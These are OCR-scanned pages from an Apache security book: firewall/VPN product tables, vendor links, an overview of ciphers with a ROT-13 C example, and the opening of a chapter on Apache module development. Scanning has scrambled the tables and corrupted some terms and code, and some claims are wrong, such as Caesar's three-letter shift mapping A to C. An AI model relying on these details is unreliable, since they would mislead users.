Sparc, Linux 

Yes 

Integrated GUlI—very nice 

Genuity Advantage 

Yes 

DES, TripleDES 

PAP, CHAP, SHA-1, MDS, L2F, L2P, IKE, RADIUS, Entrust, Verisign 

Yes 

Yes 

Yes 

Yes 

Yes 

100, 400, or 5,000, depending on model 

Depends on model, but in the thousands to tens-of-thousand range 
Yes 

N/A—this is a switch-based solution 

Yes 

Varies, depending on model 

Yes 

IBM AIX VPN 

Yes, IP address and subnet mask for IPv4 and IPv6, Interface, protocol 
and port numbers, inbound or outbound packets forwarded or local 
packets, fragmented packets 

DES—Data Encryption Standard, Triple DES, Null encryption, MD5— 
Message Digest 5, SHA1—Secure Hash Algorithm 1 

Internet Key Exchange for IP Version 4 and 6 Signature mode using 
RSA Digital Certificates, Preshared Key Mode, Certificate Revocation 
Lists, Manual Tunnels for IP Versions 4 and 6 

Yes 

Yes 

Yes 

Yes 

Yes 

IP address and subnet mask for IPv4 and IPv6, Interface, protocol and 
port numbers, inbound or outbound packets, forwarded or local 
packets, fragmented packets 

Unix 

Yes 
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TABLE 16.8 Continued 








Field Details 

Warranty 1 year 

Web Config No, but an excellent Visual Policy Editor 
Product Icon West Qwest Firewall and VPN 
Access Control Yes 

Algorithms DES, TripleDES 

Auto-Alerts Yes 

Content Filtering Yes 

IP Forwarding Yes 

IPSEC Gateway Yes 

LAN/WAN/DMZ Yes 

Packet Filtering Yes 

Stateful Inspection Yes 


Product 
Access Control 
Algorithms 


Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 


Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 


Indus River Aurorean Virtual Network 

Yes 

40, 56, 128, 168 DES/TripleDES, Microsoft Point-to-Point Encryption 
(MPPE) 

HMAC SHA1, HMAC MDS, MS-CHAP, RADIUS, Token Cards, IKE 
Yes 

Yes 

Yes 

Yes 

Yes 

See Max Connections 

between 500 and 20,000, depending on model 

Yes 

Hardware-based ANG-7050 and ANG-3000 

Yes 

Varies depending on model and config; see vendor 

Yes. Also, CLI-based Telnet config, which is excellent for script-based 
manipulation and automation 

Lucent Technologies VPN Firewall Brick 1000 

Yes 

DES, Triple DES, RC4 

Entrust, PKI, VeriSign, Baltimore X.509, MD5 SHA-1 

Yes 

Yes 

Yes 

Yes 

Yes 

N/A applies to networks 
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Field Details 
Max Connections 3000 Tunnels 
Packet Filtering Yes 


Platforms 
Stateful Inspection 
Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
Packet Filtering 
Platforms 

Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 
Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 
Algorithms 
Authentication 


Auto-Alerts 
Content Filtering 


N/A—hardware-based solution 

Yes 

Integrates with Security Management Server 
Network Associates Gauntlet 6.0 

Yes 

DES, 3DES, CAST encryption standards 
RADIUS, Secure ID,S/Key, CryptoCard, LDAP, and DSS. 
Yes 

Yes 

Yes 

Yes, with integrated firewall 

Yes 

Supports Solaris 8, HP-UX 11.0 

Visual Policy Editor (GUI) 

Netscreen Security Systems Netscreen 1000 
Yes, through integrated firewall 

DES, TripleDES 

IKE, PKI, X.509, VeriSign, Entrust, Microsoft 
Yes 

Yes 

Yes 

Yes 

Yes 

15,000 

500 

Yes, through integrated firewall 
Hardware-based solution 

Yes 

Hardware: 1 year. Software: 90 days 

Yes 

Symantec Enterprise VPN 

Yes 

N/AN/A 

Defender, CryptoCard, SecurelD, S/Key, RADIUS, TACACS, IKE, RC-2, 
DES, TripleDES 

Yes 

Yes 
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TABLE 16.8 Continued 








Field Details 

IP Forwarding Yes 

IPSEC Gateway Yes 

LAN/WAN/DMZ Yes 

Max Users Default is 10, user-specifiable 


Max. Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 


Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Packet Filtering 
Platforms 


Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 


Algorithms 
Authentication 
Auto-Alerts 


Content Filtering 


IP Forwarding 
IPSEC Gateway 


Default is 10,000, user-specifiable 

Yes 

Windows NT, Windows 2000, Solaris, HP-UX 

Yes 

Native GUI 

Red Creek Ravlin 7160 

Yes 

DES, TripleDES 

HMAC-MDS, SHA-1, RADIUS, X.509 

Yes. Multiple destination forwarding of event logs by entry type and 
severity, forwarding of SNMP traps to external management systems 
(OpenView, Tivoli, Spectrum) for automation, paging, and so on 
Yes 

Yes 

Yes 

Yes 

Yes 

Hardware-based solution, but ships with clients for Win 
95/98/2000/ME/NT 

Yes 

1 year 

SNMP 

Microsecure 

Yes. Admins can restrict access by IP addresses, protocols, services, 
users, or time frames 

DES, TripleDES, Blowfish 

Yes. Data: HWAC-MD5 and SHA-1. Humans: Microsecure Firewalls 
Password, RADIUS, One-time Password (S/Key), RSA SecurelD Tokens, 
Kerberos, Digital Certificates, or an IKE Pre-shared secret key 

Yes. Alarms, alerts, warnings, notices 

Yes. GET, PUT, POST, CONNECT, Java, JavaScript, ActiveX, redirects, 
and so on 

Yes 

Yes 
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Field Details 
LAN/WAN/DMZ Yes 
Max Users Unlimited but controllable 


Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 


Unlimited but controllable 

Yes 

Solaris, SolarisX86, Linux, Unix. 
Yes 

1 Year 

Yes 





Table 16.9 lists other popular commercial firewall vendors. 


TABLE 16.9 Popular Commercial Firewall Vendors 





Vendor Address 

3Com http: //www.3com.com 

Astaro http://www. astaro.com/ 

Check Point http://www. checkpoint.com/ 

Cisco http: //www.cisco.com/ 

CMS (Praetor) http: //www.cmsconnect.com/Praetor/prMain.htm 
CyberGuard http://www. cyberguard.com/HOME/home.htm1 
Data Check Services http: //www.datacheck.ca/ 

EBiz http://www. ebizenterprises.com/ 

Elron http://www. elronsoftware.com/ 

eSoft http: //www.esoft.com/ 

Evidian http://www. evidian.com/ 


Firewall Servers 
Genuity 

GTA (Robox) 
InfoExpress 
InnerTek 

J. River 

KarlNet 
Knowledge Group 
LightHouse 
McAfee 

Merilus 
MultiTech 
NetBSD Firewall 


http://www. firewall-servers.com/ 
http://www. genuity.com/services/ index.htm 
http: //www.gta.com/ 

http://www. infoexpress.com/ 

http://www. innertek.com/ 

http://www. jriver.com/ 

http: //www.gbnet.net/karlnet/ 
http://www. ktgroup.co.uk/ 

http: //www.lh.net/products/products.html 
http: //www.mcafee.com/ 

http: //www.merilus.com/products/ 

http: //www.multitech.com/ 

http://www. dubbele.com/ 
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TABLE 16.9 Continued 











Vendor Address 
NetlQ http: //www.netiq.com/ 
NetMind http: //www.netmind-firewall.com/ 
NetScreen http: //www.netscreen.com/ 
NetWolves http: //www.netwolves.com/nss.htm 
Network-1 http: //www.network-1.com/products/index. html 
Nexland http: //www.nexland.com/index.cfm 
Nokia http: //www.nokia.com/securenetworksolutions 
Novell http: //www.novell.com/ 
OpenDoor http: //www.opendoor.com/ 
PresiNet http: //www.presinet.com/Main/Deadbolt.htm 
Rainfinity http: //www.rainfinity.com/ 
RapidStream http: //www.rapidstream.com/ 
RedCreek http://www. redcreek.com/ 
Secure Computing http: //www.securecomputing.com/ 
Securepoint http: //www.securepoint.cc/ 
ServGate http: //www.servgate.com/ 
SmithMicro http://www. smithmicro.com/ 
SofaWare http://www. sofaware.com/ 
Stoneylake http: //www.stonylakesolutions.com/ 
Sygate Technolgies http: //www.sygate.com/ 
Symantec Corporation http: //enterprisesecurity.symantec.com/ 
Telos http: //www.telos.com/ 
V-One http: //www.v-one.com/ 
WorldCom http: //www1.worldcom.com/us/ 
ZoneLabs http://www. zonelabs.com/ 
ZyXel http://www. zyxel.com/ 
Summary 


Apache was never intended to be a full-fledged firewall, but it does well as a proxy 
for several machines. However, if yours is an enterprise network, consider a commer- 
cial firewall solution. Doing things the homegrown way is admirable, but when 
money’s on the line, nothing takes the place of the proper tools. 


1 7 IN THIS CHAPTER 


e What Is a Cipher? 


Apache and Ciphers 


e MD5 
e SSL 
Apae through either modules or Apache-SSL, supports * Other Ciphers 
a wide range of ciphers and this brief chapter introduces 

them. 


What Is a Cipher? 


The humdrum definition of the term cipher is simply this: 
A cipher is any mathematical operation with which you 
encrypt or encode text or data, usually to hide that text or 
data from unauthorized eyes. The cryptography field 
concerns itself chiefly with ciphers. 


The word cryptography stems from two ancient words: 
krypto (hidden) and graphia (writing). Cryptography, there- 
fore, is the science of secret writing. In cryptography, you 
create messages that only authorized personnel can read. 
To everyone else, cryptographic or encrypted text is gibber- 
ish, and you create that gibberish using ciphers. 


Early cryptography was primitive, often consisting of 
anagram-style scrambling, in which authors merely 
rearranged a message’s characters (apache becomes pehaca). 
However, in roughly 2000 B.C. during the reign of 
Mentuhotep III, the Egyptians dispensed with jumbled, 
plain text passwords. Over those next 1,000 years, in addi- 
tion to fractions and primitive algebra, Egyptians devel- 
oped rudimentary cryptography. 


One method the Egyptians used was to write their 
messages downward (as opposed to across) on long strips 
of papyrus, laid horizontally adjacent to one another, but 
of variable lengths. They would then wrap these strips 
around large sticks or columns. Unless you knew precisely 
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where on the target column to begin wrapping each strip, and the order in which 
the author meant strips to be wrapped, the message would never emerge because the 
descending ideographs would never line up properly. 


Later in Roman times, messengers used substitution ciphers, the first ciphers that 
didn’t require any external physical device or medium. Early substitution ciphers 
used simple formulas that uniformly converted each character to another. Julius 
Caesar popularized one substitution cipher that consisted of shifting characters 
ahead by three. Hence, the letter A becomes C, the letter B becomes D, and so on. 
This cipher historically became known as “Caesar’s Cipher.” 


Today, substitution ciphers exist but aren’t used for serious data hiding. One is ROT- 
13, a substitution cipher that shifts characters 13 positions ahead (A becomes N, B 
becomes O, and so on). Here’s a simple ROT-13 implementation: 


#include <stdio.h> 

#include <ctype.h> 

/* test-rot13.c 

A simple ROT-13 substitution cipher. 

To compile: "cc test-rot13.c -o rot13" */ 


void main() { 
int user_input; 
printf ("Please enter some text to encrypt or decrypt\n"); 
printf ("-------------+------ eee eee ee eee \n"); 
while((user_input=getchar())) { 
if (islower(user_input) ) 
user_input = 'a' + (user_input - 'a' + 13) % 26; 
if (isupper(user_input) ) 
user_input = 'A' + (user_input - 'A' + 13) % 26; 
putchar(user_input) ; 


Running this book’s title through the ROT-13 implementation turns that string into 
seeming gibberish: 


./roti3 

Please enter some text to encrypt or decrypt 
Maximum Apache Security 

Znkvzhz Nenpur Frphevgl 
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Likewise, running the encoding string through brings back this book’s title: 


./rot13 

Please enter some text to encrypt or decrypt 
Znkvzhz Nenpur Frphevgl 

Maximum Apache Security 


The chief advantage of ROT-13-style ciphers is that they obscure the original letters 
used. Hence, attackers cannot decode the message as they would with an anagram 
(by rearranging letter positioning). They must instead deduce your original shifting 
formula, which is more difficult. 


Simple substitution ciphers are too rudimentary to protect data, though. So, over the 
centuries (and particularly in the last 100 years), researchers have developed many 
different cipher types. Initially, these ciphers were simple enough that human 
beings, spending hours or days, could ascertain what algorithm researchers used. 
However, as computers emerged that could perform millions of calculations per 
second, the demand for stronger encryption increased. 


NOTE 


People still use substitution ciphers for some tasks, though. One is to ensure that a Web 
page’s contents or a Usenet post's text drops out of traditional Web crawler indexing proce- 
dures. Web crawlers trigger indexing based on pattern searching (regular expression or regex 
evaluation) and therefore miss ROT-13 encoded paragraphs or documents. This sounds silly, 
but it isn’t. Many firms now use both humans and robots to search hacking forums and IRC 
channels for recent revelations in the cracking community. One such firm has 40 people 
working in shifts operating 24 hours a day to cull such information from several hundred 
sources and sell it to customers who maintain large networks. Because most such searches are 
now automated, some crackers pass code in ROT-13, thus buying an extra few hours before 
their new utility hits the aboveground wires at security sites around the globe. One group | 
know personally even applied ROT-13 to certain portions of its Web site, because documents 
that were in the “allowed” category (and were, therefore, indexable via robots) housed data 
they didn’t want indexed. 





Today, we know of hundreds of ciphers, and many of these have very specialized 
uses. However, in relation to Apache and most network applications, the most 
common cipher type is the block cipher. 


Block Ciphers 


Block ciphers are ciphers that work on determinate blocks of data, and determinate 
in this instance refers to their size. That is, block ciphers operate on data blocks of a 
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fixed size (64 bits in many cases). Such ciphers also typically use only one secret, 
shared key (which would be 56-, 64-, or 128-bits) and involve successive rounds of 
one or another nonlinear mathematical function. Such functions often use one 
portion of a derived value as input, and the rest in XOR (exclusive-or). This struc- 
ture, which modern crypto folks call “the Feistel structure” after its inventor, IBM’s 
Horst Feistel, is fast, easy, and efficient. 


NOTE 


For an excellent overview on block ciphers that includes process model diagrams of substitu- 
tion, permutation, and other operations of many popular block ciphers, check Bill Stallings’ 
“Modern Private Key Ciphers Part 1,” located at 

http: //williamstallings.com/Extras/Security-Notes/lectures/blockA.html. Part 2 can 
be found at http: //www.williamstallings.com/Extras/Security - 
Notes/lectures/blockB.html. 





Popular block ciphers in use today include the following: 


e 3-Way—3-Way is a fast cipher from Joan Daemen. 3-Way uses a 96-bit key 
length and a 96-bit block length, it’s an iterated block cipher, and it repeats 
several operations in a specified number of rounds. (Side note: Counterpane 
Systems has developed a key attack on 3-Way.) To learn more, download 
“Related-Key Cryptanalysis of 3-WAY, Biham-DES, CAST, DES-X, NewDES, RC2, 
and TEA,” by John Kelsey, Bruce Schneier, and David Wagner at 
http://www.cs.berkeley.edu/~daw/papers/keysched-icics97.ps. (This docu- 
ment requires a PostScript viewer.) 


e Blowfish—Designed by Bruce Schneier in 1994, Blowfish is a 64-bit, 16-round 
Feistel block cipher that uses a variable length key. Mr. Schneier developed 
Blowfish for bulk data encryption. It uses four 8x32-bit random substitution 
boxes generated from the key, the output of which is combined using simple 
addition and XOR. SSH can use Blowfish. Learn more about Blowfish at 
http: //www.counterpane.com/blowfish.html. 


e CAST—CAST a 64-bit, 8-round Feistel block cipher with a 64-bit key, designed 
by C. Adams and S. Tavares. It uses six 8x32 bit substitution boxes and 
combines output with XOR. CAST is popular in Canada, and supported by 
many networking applications. Learn more about CAST by downloading “The 
CAST-256 Encryption Algorithm” by Carlisle Adams, located here: 
http: //www.entrust.com/resources/pdf/cast -256.pdf. 


e DEAL—DEAL uses a 128-bit block and can handle 128-bit, 192-bit, and 256-bit 
key lengths. It uses DES as its inner-round function (default rounds equal six, 
but it’s safer with eight). To read some interesting perspectives on cracking 
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DEAL, download “DEAL—A 128-bit Block Cipher” by Lars R. Knudsen, located 
at http: //www.ii.uib.no/~larsr/papers/deal.ps. (This document requires a 
Zip utility and a PostScript viewer.) 


RC2 and RC5—RC2 and RCS are two private key block ciphers developed by 
Ron Rivest of RSA Data Security, Inc. RC2 and RCS implementations, although 
popular and present in many Web clients such as Netscape Navigator, are not 
fully published (RSA is a commercial enterprise). RC4, a cousin of these, was 
published, however, though not formally. Learn more about RCS and related 
algorithms at ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/rc5.ps.Z. 
(This document requires a Zip utility and a PostScript viewer.) 


DES—DES (The Data Encryption Standard, discussed in more detail later in this 
chapter) uses a 64-bit data block and a 56-bit key. Learn more about DES at 
http: //www.itl.nist.gov/div897/pubs/fip46-2.htm/. 


FEAL—FEAL is a 64-bit, 32-round (maximum) Feistel block cipher with a 64- or 
128-bit key from Shimizu and Miyaguchi of NTT (Nippon Telegraph and 
Telephone). FEAL exists in not merely software, but hardware as well, and isn’t 
intended to stand up to exhaustive attack. 


GOST—GOST is DES’ Russian counterpart. It uses a 256-bit key and runs 32 
rounds. Find more information on GOST in the “Government Standard of the 
U.S.S.R. Cryptographic Protection for Data Processing Systems, Cryptographic 
Transformation Algorithm” (a translation from the original Russian specifica- 
tion) at http://www. jetico.sci.fi/gost.zip. Note: This file is zipped. When 
you unzip it, you'll see two files (Russian and Russian-1). These are 
PostScripts, but have no file extension. Rename these Russian.ps and 
Russian1.ps and open them in a PostScript-enabled viewer. 


IDEA—IDEA (International Data Encryption Algorithm) is a 64-bit, 8-round 
block cipher with a 128-bit key from X. Lai and J. Massey. IDEA is today 
embedded in SSH, PGP, and other popular tools. 


LOKI91—LOKI91 is a 64-bit, 16-round, symmetric block cipher with a 64-bit 
key designed by Brown, Pieprzyk, and Seberry. Learn more about LOKI at 
ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/rijmen/loki97.ps.gz. (This docu- 
ment requires a Zip utility and a PostScript viewer.) 


Lucifer—Lucifer was likely the earliest modern cryptographic algorithm of the 
block cipher variety. Horst Feistel designed it in the 1960s, and it shares some 
characteristics with DES. Lucifer is a precursor to DES. To read a study on 
Lucifer, go to http: //www.cs.technion.ac.il/~biham/Reports/cs782.ps.gz. 
(Gzip and PostScript required.) 
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e SAFER—SAFER is a 64-bit, 6 or higher-round, iterated block cipher with 64- or 
128-bit keys, designed by J. Massey. Learn more about SAFER here: 
ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/trunc_dif_saf.ps.Z. 
(Gzip and PostScript required.) 


e SQUARE—SQUARE is a 128-bit, 8-round block cipher by Joan Daemen and 
Vincent Rijmen, and is reportedly resistant to differential and linear crypt- 
analysis. Learn more about SQUARE at 
http: //www.esat.kuleuven.ac.be/~rijmen/square/index.html. 


e TEA—TEA (Tiny Encryption Algorithm) is a 64-bit, 32-round Feistel block 
cipher with a 128-bit key from Wheeler & Needham. It uses a round function 
that alternates additions with XOR. Find out more at http: //www.cs.berke- 
ley. edu/~daw/papers/keysched-icics97.ps. (This document requires a 
PostScript viewer.) 


Block ciphers now operate in not merely super, mini, micro, and personal comput- 
ers, but also many mobile devices and “embedded” environments, including hand- 
helds. 


NOTE 

One paper that throws an interesting perspective on this is “The Performance Measurement 
of Cryptographic Primitives on Palm Devices,” by Duncan S. Wong, Hector Ho Fuentes, and 
Agnes Chan at Northeastern University. 


This is a good study on security versus performance and overhead, and sheds light on opti- 
mization. Download the PDF file here: http: //www.acsac.org/2001/papers/25.pdf. 


The following list points to important documents that lay bare the secrets of block 
ciphers. 


e “Differential Cryptanalysis of DES-like Cryptosystems,” Eli Biham and Adi 
Shamir. http: //www.cs.technion.ac.il/~biham/Reports/Weizmann/cs90- 
16.ps.gz. (Gzip and PostScript required.) 


e “Differential Cryptanalysis of Lucifer,” Ishai Ben-Aroya and Eli Biham. 
http: //link.springer.de/link/service/journals/00145/bibs/9n1p21.htm1. 


e “Differential Cryptanalysis of the Full 16-round DES.” ww. info- 
sec.com/crypto/CS0708.ps.gz. (Gzip and PostScript required.) 


e “Markov Ciphers and Differential Cryptanalysis,” Xuejia Lai, James Massey, and 
Sean Murphy. http: //ww.cs.rhbnc.ac.uk/~sean/xuejia.ps (PostScript 
required.) 
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e “Provable Security Against a Differential Attack,” Kaisa Nyberg and Lars 
Knudsen. ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/ jourpap.ps.Z. 
(Zip utility and PostScript required.) 


e “Tutorial on Linear and Differential Cryptanalysis,” Howard Heys. 
http: //www.engr.mun.ca/~howard/PAPERS/1dc_tutorial.ps. (PostScript 
required.) 


Let’s look at a few block ciphers Apache supports. 


DES 


The Data Encryption Standard (DES) is arguably history’s most popular cipher, even 
though it’s been around a mere 27 years. 


In the 1970s, the U.S. government already used several ciphers in classified, secret, 
and top secret environments. However, it lacked a standardized encryption method 
for more general use. In 1973, the National Bureau of Standards attempted to 
remedy that. 


Federal Information Processing Standards Publication 74: Guidelines for Implementing 
and Using the NBS Data Encryption Standard explains: 


Because of the unavailability of general cryptographic technology outside the national security 
arena, and because security provisions, including encryption, were needed in unclassified 
applications involving Federal Government computer systems, NBS initiated a computer secu- 
rity program in 1973 which included the development of a standard for computer data 
encryption. Since Federal standards impact on the private sector, NBS solicited the interest 


and cooperation of industry and user communities in this work. 


Many companies developed proposals, but IBM prevailed. IBM’s DES survived rigor- 
ous testing, and by 1977, the National Bureau of Standards and the National Security 
Agency endorsed it. Since then, DES has been the de facto algorithm used in unclas- 
sified environments and many operating system password schemes (including Unix 
variants). 


Both encryption and decryption functions rely on a key, without which unautho- 
rized users cannot decrypt a DES-encrypted message. This key (derived from the 
user’s typed password and some padded information, as discussed later) consists of 
64 binary digits (Os and 1s). 56 bits are used in encryption, and 8 are used in error 
checking. The total number of possible keys is therefore quite high: If the complete 
64-bit input is used (i.e., none of the input bits should be predetermined from block 
to block) and if the 56-bit variable is randomly chosen, no technique other than 
trying all possible keys using known input and output for the DES will guarantee 
finding the chosen key. As there are over 70,000,000,000,000,000 (70 quadrillion) 
possible keys of 56 bits.... 
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DES as a block cipher, is a cipher that works on data blocks of 64-bit chunks. Blocks of 
data that exceed this determinate size are broken into 64-bit fragments. The remain- 
ing portions shorter than 64 bits are then padded. Padding is when DES adds 
insignificant bits to smaller parts to achieve a complete 64-bit block. 


From here, DES performs three important operations, the first of which is the initial 
permutation. In permutation, data bits are shifted to different positions in a table. 
Through this initial permutation, DES derives an input block. The input block is then 
scrambled by complex mathematical operations (a process called transformation) to 
produce a pre-output block. Finally, the pre-output block is subjected to still another 
permutation, and the final result is the scrambled text, sometimes called encrypted 
text but more accurately referred to as encoded text. 


NOTE 


If you want specifics (including mathematical formulas) on how DES arrives at encrypted text, 
see the resource links at the end of this chapter or go to 

http: //www.itl.nist.gov/div897/pubs/fip46-2.htm. Linux’s implementation of DES is 
crypt(3), an enhanced, high-speed efficient DES implementation available in libdes from Eric 
Young. You'll find that many security programs use or incorporate libdes, including Secure 
Shell. 





RC2 


Another popular block cipher is RC2 (created by Ron Rivest, from whence the cipher 
derives its name, “Ron’s Code”). As explained by RSA Data Security, for whom Rivest 
designed RC2, RC2 


...has a block size of 64 bits and is about two to three times faster than DES in software. An 
additional string (40 to 88 bits long) called a salt can be used to thwart attackers who try to 
precompute a large look-up table of possible encryptions. The salt is appended to the encryp- 
tion key, and this lengthened key is used to encrypt the message. The salt is then sent, unen- 
crypted, with the message. RC2 and RC4 have been widely used by developers who want to 


export their products; more stringent conditions have been applied to DES exports. 


Source: RSA Cryptography FAQ, Section 3.6.2, RC2, 
http://www. rsasecurity.com/rsalabs/faq/3-6-2.html. 


To learn more about RC2 and its design, see RFC 2268, located here: 
ftp://ftp.nordu.net/rfc/rfc2268.txt. 


NOTE 


RC2 can be cracked. Get Counterpane Labs’ Windows 95-compatible S/MIME 40-bit RC2 
Cracking Screensaver at http://www. counterpane.com/smime-download.html. 
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MDS 


Beyond digest-based authentication that’s already built in, Apache supports MDS 
(discussed in Chapter 11) through modules and other utilities. They include the 
following: 


e Apache-Session from Jeffrey Baker offers a sprawling assortment of tools, 
including Apache: :Session: :Generate: :MD5, which uses MDS to create 
random object IDs. Get it at 
http: //www.cpan.org/authors/id/JBAKER/Apache -Session-1.54.tar.gz. 


e Apache-SessionX from Gerald Richter provides an extended persistence frame- 
work for session data, 
Apache: :SessionX: :Generate: :MD5.Apache: :Session: :Generate: :MD5, which 
uses MDS to create random object IDs. Get it at 
http: //www.cpan.org/authors/id/GRICHTER/Apache -SessionxX -2.00b3.tar.gz. 


e FrogDot from Heinz Richter provides realm and MDS digest-based cookie 
authentication for document trees (and fast login for users using MD5 signed 
cookies). Get it at http://www. frogdot.org. 


SSL 


Apache supports SSL (covered in Chapter 15, “Apache/SSL”), and not merely through 
Apache-SSL. Modules exist that either help Apache facilitate SSL support or piggy- 
back on other utilities that do. They include the following: 


e Covalent Raven SSL, from Covalent Technologies, is a commercial package that 
provides the capability to easily secure Web transactions via both SSL and TLS. 
Get it at www.covalent.net/products/ss1/. 


e mod_auth_oracle/win32, from Karsten Pawlik and Serg Oskin, is a module for 
authenticating against a Oracle8.x.x-Database, which works with mod_ss1. Get 
it at 
http: //www.designlab.de/service_support/downloads/downloads/mod_auth_ 
oracle.zip. 


e mod_authz_ldap from Andreas Mueller provides SSL-wrapped LDAP authoriza- 
tion and certificate verification (if you have mod_ss1). Get it at http: //authz1- 
dap.othello.ch. 


e mod_ssl from Ralf S. Engelschall provides a free Apache Interface to SSLeay 
(free SSL, essentially). Get it at http: //www.modssl.org/. 


e Whitebeam, from The Whitebeam Project, provides an SSL-enabled, XML-based 
rapid design environment for dynamic Web content. Get it at 
http: //www.whitebeam.org/. 
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Other Ciphers 


Through Apache-SSL, Apache can support several ciphers, and even several versions 
of specific ones. Table 17.1 describes them and their bit levels. 


TABLE 17.1 Apache-SSL Cipher Support 





Function Bits Encrypted Bits 
ADH-DES-CBC3-SHA 168 168 
ADH-DES-CBC-SHA 56 56 
ADH-RC4-MD5 128 128 
DES-CBC3-MD5 168 168 
DES-CBC3-SHA 168 168 
DES-CBC-MD5 56 56 
DES-CBC-SHA 56 56 
DES-CFB-M1 56 56 
DH-DSS-DES-CBC3-SHA 168 168 
DH-DSS-DES-CBC-SHA 56 56 
DH-RSA-DES-CBC3-SHA 168 168 
DH-RSA-DES-CBC-SHA 56 56 
EDH-DSS-DES-CBC3-SHA 168 168 
EDH-DSS-DES-CBC-SHA 56 56 
EDH-RSA-DES-CBC3-SHA 168 168 
EDH-RSA-DES-CBC-SHA 56 56 
EXP-ADH-DES-CBC-SHA 128 40 
EXP-ADH-RC4-MD5 128 40 
EXP-DES-CBC-SHA 56 40 
EXP-DH-DSS-DES-CBC-SHA 56 40 
EXP-DH-RSA-DES-CBC-SHA 56 40 
EXP-EDH-DSS-DES-CBC-SHA 56 40 
EXP-EDH-RSA-DES-CBC 56 40 
EXP-RC2-CBC-MD5 128 40 
EXP-RC4-MD5 128 40 
FZA-FZA-CBC-SHA -1 -1 
FZA-NULL-SHA 0 0 
FZA-RC4-SHA 128 128 
IDEA-CBC-MD5 128 128 
IDEA-CBC-SHA 128 128 
NULL 0 0 
NULL-MD5 0 0 
NULL-SHA 0 0 
RC2-CBC-MD5 128 128 
RC4-64-MD5 64 64 
RC4-MD5 128 128 


RC4-SHA 128 128 
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Summary 


Configuration of ciphers other than SSL and MD5 are beyond the scope of this book. 
For general knowledge of ciphers and cryptology, I recommend Decrypted Secrets: 
Methods and Maxims of Cryptology by Friedrich Ludwig Bauer (Springer Verlag). 
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Apache’s modular design admittedly makes these tasks easier. Native Apache 
modules handle many problems that developers normally must address alone. Let’s 
briefly review how Apache transactions unfold, and which procedures Apache’s 
native modules address. 


Apache Transactions in Brief 


As discussed in Appendix D, “Apache API Quick Reference,” Apache traverses 
through several phases as it handles a request. These include, but need not be 
limited to, the following: 


e The connection 

e URI handling 

e Auth and user identification 

e Access checking 

e MIME handling 

e The response 

e Logging 
Your first task is to figure out where in that sequence your module will intervene (or 
whether it will cancel out any of the previously described phases, a contingency I 


don’t recommend, but you could have reasons for it). Figure 18.1 illustrates the 
phases Apache traverses. 


However, to a module developer, a somewhat pared-down phase representation is 
more useful, as illustrated in Figure 18.2. 


In this structure, you'll consider intervening or integrating your own work at several 
points. Of these, one important component is your command table, which commu- 
nicates commands your module recognizes and passes to Apache, as shown in 
Figure 18.3. 


Command Table Structures 


Typically, you’ll add a command table structure, which Apache will configure and 
integrate before it handles a request. 
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mod_include 
mod_cgi 
mod_cgid 
mod_actions 


mod_headers 
mod_cern_meta 
mod_expires 
mod_asis 


mod_log_config 
mod_usertrack 


FIGURE 18.1 Apache's phases. 
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FIGURE 18.2 Apache's basic phases. 
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| initialization | | Internal Apache startup 
Command tables | command handler | | Establish commands and 
Re aplasia eset ares translation conventions 
- 
|| 


Handle essential security 
user auth check 


controls 
user access check 
type checker Content type, charset, 
fixer_upper ete. 
content handling 
logging Do it and log it 


additional handlers 





FIGURE 18.3 Apache’s command-handling phase. 


Command tables describe and define your module’s commands. Your module passes 
its command table to the command handler. A typical command table looks like 
this, taken from mod_log_config.c: 


static const command_rec config log cmds[] = 
{ 
AP_INIT_TAKE23("CustomLog", add_custom_log, NULL, RSRC_CONF, 
"a file name, a custom log format string or format name, " 
"and an optional \"env=\" clause (see docs)"), 
AP_INIT_TAKE1("TransferLog", set_transfer_log, NULL, RSRC_CONF, 
"the filename of the access log"), 
AP_INIT_TAKE12("LogFormat", log format, NULL, RSRC_CONF, 

"a log format string (see docs) and an optional format name"), 
AP_INIT_TAKE1("CookieLog", set_cookie_log, NULL, RSRC_CONF, 

"the filename of the cookie log"), 
{NULL} 


w 








}; 


Notice that the leading strings match the directives CustomLog, TransferLog, 
LogFormat, and CookieLog. 


Content Handlers 


Another area where your module will likely intervene is in content handling, as in 
Figure 18.4. 
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| initialization | | Internal Apache startup 
| command handler | | Establish commands and 
| translate handler | translation conventions 
e 


Handle essential security 
user auth check 


controls 
user access check 
type checker Content type, charset, 
fixer_upper etc. 
Content handlers content handling 


communicate ways Do it and log it 
to manipulate data gging g 
additional handlers 


FIGURE 18.4 Apache’s content-handling phase. 





Some sample content-handling modules that intervene here include the following: 


e mod_actions—Provides support for executing CGI scripts based on media type 
or request method. 


e mod_cgi—Provides support for invoking CGI scripts. 


e mod_cgid—Provides support for invoking CGI scripts using an external 
daemon. 


e mod_ext_filter—Provides support for filtering content with external 
programs. 


e mod_include—Provides support for server-parsed documents. 
e mod_isapi—Provides support for Windows ISAPI Extension support. 


e mod_suexec—Provides support for running CGI requests as a specified user and 
group. 


mod_include. c, for example (which handles includes), has functions that interpret, 
validate, and execute SSI directives: 


if(ssi_pfn_register) { 
ssi_pfn_register("if", handle_if); 
ssi_pfn_register("set", handle set); 
ssi_pfn_register("else", handle else) ; 
ssi_pfn_register("elif", handle elif); 
ssi_pfn_register("echo", handle echo) ; 
ssi_pfn_register("endif", handle endif) ; 
ssi_pfn_register("fsize", handle _fsize) ; 
